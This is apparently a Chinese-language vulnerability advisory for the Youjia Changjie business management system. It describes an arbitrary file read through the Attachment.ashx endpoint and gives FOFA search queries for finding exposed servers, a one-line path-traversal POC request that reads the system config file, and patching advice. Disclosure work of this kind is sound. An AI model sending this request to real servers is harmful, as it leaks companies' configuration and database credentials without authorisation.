一.免责声明
本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本文信息时,必须严格遵循适用的法律法规及服务协议,自行承担一切风险与责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。
二.产品简介
友加畅捷管理系统是一款专为小微商贸流通企业设计的财务业务一体化管理软件,涵盖进销存、财务、分销及移动管理等多个模块,旨在帮助企业实现高效的业务运营和财务核算。
三.漏洞描述
友加畅捷管理系统的 系统的 Attachment.ashx 接口存在任意文件读取漏洞。攻击者可利用此漏洞,未经授权地读取服务器上的任意文件,包括但不限于系统配置文件和数据库配置文件等敏感信息。 成功利用此漏洞可能导致企业内部敏感数据泄露,对系统的机密性和完整性构成潜在威胁。。
四.影响版本
13.7004.1053.1000
五.网络测绘
fofa:
icon_hash="2049187099" || fid="zzt8lL7SUwIIZQXZY6rTSw=="
六.漏洞复现
POC:
GET /Controllers/ajax/Attachment.ashx?attachmentUrl=../../config/sysconfig_zts.fig HTTP/1.1
Host: 
七.修复建议
联系厂商获取升级修复补丁。 添加授权认证模块,限制非授权用户访问。
请登录后发表评论
注册
停留在世界边缘,与之惜别